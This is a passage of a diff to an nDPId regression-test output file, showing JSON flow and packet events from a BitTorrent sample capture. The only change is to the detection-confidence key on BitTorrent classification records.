{"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} 
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":39,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469974533,"flow_last_seen":1455469974533,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469974533,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.57.97.83","src_port":52906,"dst_port":53137,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00564{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1455469974533,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469974533,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4WuVAAEAGAADAqAEDUjlhU86qz5GeFCpM34MiOYAY0pJ1ogAAAQEIChncDF0AFHySE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjjDhVI8cWXj55ew="} -00855{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":39,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469974533,"flow_last_seen":1455469974533,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469974533,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.57.97.83","src_port":52906,"dst_port":53137,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": 
{"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} +00855{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":39,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469974533,"flow_last_seen":1455469974533,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469974533,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.57.97.83","src_port":52906,"dst_port":53137,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"5":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} 00632{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1455469974879,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":185,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":185,"pkt_l4_len":151,"thread_ts_msec":1455469974879,"pkt":"xCwDBkn+LFbcjDU0CABFAACrC6JAAHcGgnNSOWFTwKgBA8+RzqrfgyI5nhQqkIAYAQJ8JwAAAQEICgAUfLUZ3AxdE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC3wosdxOntFzioIvnoAAADnFABkMTplaTBlNDppcHY0NDpSOWFTMTI6Y29tcGxldGVfYWdvaTBlMTptZDExOnU="} 
01301{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1455469974888,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":586,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":586,"pkt_l4_len":552,"thread_ts_msec":1455469974888,"pkt":"xCwDBkn+LFbcjDU0CABFAAI8C6RAAHcGgOBSOWFTwKgBA8+RzqrfgyKwnhQqkIAZAQKTPAAAAQEICgAUfLYZ3AxdcGxvYWRfb25seWkzZTExOmx0X2RvbnRoYXZlaTdlMTI6dXRfaG9sZXB1bmNoaTRlMTE6dXRfbWV0YWRhdGFpMmU2OnV0X3BleGkxZTEwOnV0X2NvbW1lbnRpNmVlMTM6bWV0YWRhdGFfc2l6ZWkxOTAwOWUxOnBpNTMxMzdlNDpyZXFxaTI1NWUxOnYxNTrOvFRvcnJlbnQgMy40LjUyOnlwaTUyOTA2ZTY6eW91cmlwNDpSN80BZQAAAHQF\/f\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/v\/\/\/\/+\/\/\/\/\/\/\/\/\/r\/\/\/\/\/\/\/\/\/\/9\/\/P\/v\/\/\/\/\/+\/3\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/v\/\/ff\/\/\/3\/f\/\/\/\/\/\/\/\/\/\/7\/\/\/\/+\/\/\/\/\/\/f\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/v\/t\/u\/\/\/\/\/\/\/\/\/gAAAAAUEAAABGAAAAAUEAAACxAAAAAUEAAAAmwAAAAUEAAAB\/wAAAAUEAAABMwAAAAUEAAABJgAAAAUEAAABZAAAAAUEAAACOgAAAAUEAAAA1QAAAAUEAAACEAAAAAUEAAACFgAAAAUEAAADTAAAAAUEAAABWwAAAAUEAAACMAAAAAUEAAADPQAAAAUEAAADSQAAAAUEAAACnwAAAAUEAAAAeQAAAAUEAAAABgAAAAUEAAAA0wAAAAUEAAABJwAAAAUEAAACfwAAAAUEAAADVQAAAAUEAAADWQ=="} 
01456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1455469975129,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":705,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":705,"pkt_l4_len":671,"thread_ts_msec":1455469975129,"pkt":"xCwDBkn+LFbcjDU0CABFAAKzM7RAAHUG4zdSOthzwKgBA5Whzqv4VM4iMb0deoAY\/SAeWQAAAQEICgCERjQZ3AuuE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC3woo6KDyQqidsX6OsAAADnFABkMTplaTBlNDppcHY0NDpSOthzMTI6Y29tcGxldGVfYWdvaTFlMTptZDExOnVwbG9hZF9vbmx5aTNlMTE6bHRfZG9udGhhdmVpN2UxMjp1dF9ob2xlcHVuY2hpNGUxMTp1dF9tZXRhZGF0YWkyZTY6dXRfcGV4aTFlMTA6dXRfY29tbWVudGk2ZWUxMzptZXRhZGF0YV9zaXplaTE5MDA5ZTE6cGkzODMwNWU0OnJlcXFpMjU1ZTE6djE1Os68VG9ycmVudCAzLjQuNTI6eXBpNTI5MDdlNjp5b3VyaXA0OlI3zQFlAAAAdAX\/\/e\/\/\/\/\/9\/\/\/\/\/v\/\/2\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/+\/\/\/7\/f\/+\/\/\/\/\/\/\/\/\/9\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/v\/\/\/\/\/\/\/7\/\/\/\/7+\/+\/\/\/+\/\/\/\/\/v\/\/\/\/\/\/3\/\/\/\/\/\/\/\/\/\/\/\/\/7\/\/8\/\/\/\/\/\/\/f\/\/\/\/3\/\/\/\/\/\/\/\/+AAAAABQQAAAI1AAAABQQAAAEuAAAABQQAAABqAAAABQQAAAE\/AAAABQQAAABtAAAABQQAAAKkAAAABQQAAAElAAAABQQAAAL5AAAABQQAAANYAAAABQQAAAA2AAAABQQAAAIPAAAABQQAAAJBAAAABQQAAAAOAAAABQQAAAMMAAAABQQAAAJ5AAAABQQAAAF6AAAABQQAAAJZAAAABQQAAAATAAAABQQAAAM4AAAABQQAAAItAAAABQQAAAHdAAAABQQAAAEPAAAABQQAAAMNAAAABQQAAABX"} 
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":45,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469975234,"flow_last_seen":1455469975234,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469975234,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.26.95.30","src_port":52911,"dst_port":22673,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00564{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1455469975234,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469975234,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4WJNAAEAGAADAqAEDlxpfHs6vWJEERbWJ8qKonIAYJJ+4TgAAAQEIChncDxURKgrLE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1Bjhul1XASmRgFxRA="} -00856{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469975234,"flow_last_seen":1455469975234,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469975234,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.26.95.30","src_port":52911,"dst_port":22673,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": 
{"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} +00856{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469975234,"flow_last_seen":1455469975234,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469975234,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.26.95.30","src_port":52911,"dst_port":22673,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"5":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":46,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469975240,"flow_last_seen":1455469975240,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469975240,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.72.255.163","src_port":52912,"dst_port":59928,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00567{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1455469975240,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469975240,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4VgZAAEAGAADAqAEDl0j\/o86w6hjbuZSz\/XvqFoAYKEhZAgAAAQEIChncDxoAaM\/9E0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjpHIptJ+s3GSLpo="} -00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469975240,"flow_last_seen":1455469975240,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469975240,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.72.255.163","src_port":52912,"dst_port":59928,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} 
+00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469975240,"flow_last_seen":1455469975240,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469975240,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.72.255.163","src_port":52912,"dst_port":59928,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"5":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":47,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469975265,"flow_last_seen":1455469975265,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469975265,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.53.228.2","src_port":52909,"dst_port":14627,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00565{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1455469975265,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469975265,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4dKFAAEAGAADAqAEDTzXkAs6tOSO1PcfcBOlxsoAYN4r1TQAAAQEIChncDzIAAH\/nE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjpuHBUmeY0dBAis="} -00855{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":47,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469975265,"flow_last_seen":1455469975265,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469975265,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.53.228.2","src_port":52909,"dst_port":14627,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} +00855{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":47,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469975265,"flow_last_seen":1455469975265,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469975265,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.53.228.2","src_port":52909,"dst_port":14627,"l4_proto":"tcp","ndpi": 
{"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"5":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} 00596{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1455469975295,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":157,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":157,"pkt_l4_len":123,"thread_ts_msec":1455469975295,"pkt":"xCwDBkn+LFbcjDU0CABFAACPKABAAHIGh9GXSP+jwKgBA+oYzrD9e+oW27mU94AYAQF3EQAAAQEICgBo0AMZ3A8aE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC3wopW+kcQUcjSA5QoAAADnFABkMTplaTBlNDppcHY0NDqXSA=="} 00613{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1455469975314,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1455469975314,"pkt":"xCwDBkn+LFbcjDU0CABFAACdCeVAAHIGRpKXGl8ewKgBA1iRzq\/yoqicBEW1zYAYHVwArAAAAQEIChEqCxYZ3A8VE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC2coV7lk33H8ZRraqcAAADnFABkMTplaTBlNDppcHY0NDqXGl8eMTI6Y29tcGxldGVf"} 
00991{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1455469975341,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":449,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":449,"pkt_l4_len":415,"thread_ts_msec":1455469975341,"pkt":"LFbcjDU0xCwDBkn+CABFAAGz+chAAEAGAADAqAEDUjrYc86rlaExvR16+FTQoYAY\/\/\/t\/gAAAQEIChncD3wAhEZHAAAA+hQAZDE6ZWkwZTQ6aXB2NDQ6UjfNATQ6aXB2NjE2Ov6AAAAAAAAAxiwD\/\/4GSf4xMjpjb21wbGV0ZV9hZ29pMWUxOm1kMTE6dXBsb2FkX29ubHlpM2UxMjp1dF9ob2xlcHVuY2hpNGUxMTp1dF9tZXRhZGF0YWkyZTY6dXRfcGV4aTFlMTI6dXRfcmVjb21tZW5kaTVlMTA6dXRfY29tbWVudGk2ZWUxMzptZXRhZGF0YV9zaXplaTE5MDA5ZTE6cGk0MDk1OWU0OnJlcXFpMjU1ZTE6djE5OsK1VG9ycmVudCBNYWMgMS44LjY2OnlvdXJpcDQ6UjrYc2UAAAABDwAAAAMJn\/8AAAADFAMAAAAAAQIAAABlFAZkODptc2dfdHlwZWkwZTM6bnVtaTIwZTY6ZmlsdGVyNjQ6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGU="} 
@@ -65,72 +65,72 @@ 00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1455469975393,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":236,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":236,"pkt_l4_len":202,"thread_ts_msec":1455469975393,"pkt":"LFbcjDU0xCwDBkn+CABFAADeIplAAEAGAADAqAEDl0j\/o86w6hjbuZVQ\/XvsloAYKDdZaAAAAQEIChncD64AaNAEMTI6dXRfaG9sZXB1bmNoaTRlMTE6dXRfbWV0YWRhdGFpMmU2OnV0X3BleGkxZTEyOnV0X3JlY29tbWVuZGk1ZTEwOnV0X2NvbW1lbnRpNmVlMTM6bWV0YWRhdGFfc2l6ZWkxOTAwOWUxOnBpNDA5NTllNDpyZXFxaTI1NWUxOnYxOTrCtVRvcnJlbnQgTWFjIDEuOC42Njp5b3VyaXA0OpdI\/6NlAAAAAQ8="} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":55,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469975407,"flow_last_seen":1455469975407,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469975407,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"120.62.33.241","src_port":52910,"dst_port":39332,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00564{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1455469975407,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469975407,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4fvZAAEAGAADAqAEDeD4h8c6umaQbpzY0C9TW44AYjjZcRQAAAQEIChncD7sAQ+m5E0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1Bjhq4aGFIV+2F24M="} 
-00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":55,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469975407,"flow_last_seen":1455469975407,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469975407,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"120.62.33.241","src_port":52910,"dst_port":39332,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} +00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":55,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469975407,"flow_last_seen":1455469975407,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469975407,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"120.62.33.241","src_port":52910,"dst_port":39332,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"5":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} 
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":56,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469975622,"flow_last_seen":1455469975622,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469975622,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.55.129.22","src_port":52908,"dst_port":12097,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00566{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1455469975622,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469975622,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4JlBAAEAGAADAqAEDTzeBFs6sL0FM+lulp3q\/xoAYVhCSYwAAAQEIChncEJACXeJGE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjsY\/A3YcaePRRY8="} -00856{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":56,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469975622,"flow_last_seen":1455469975622,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469975622,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.55.129.22","src_port":52908,"dst_port":12097,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": 
{"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} +00856{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":56,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469975622,"flow_last_seen":1455469975622,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469975622,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.55.129.22","src_port":52908,"dst_port":12097,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"5":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} 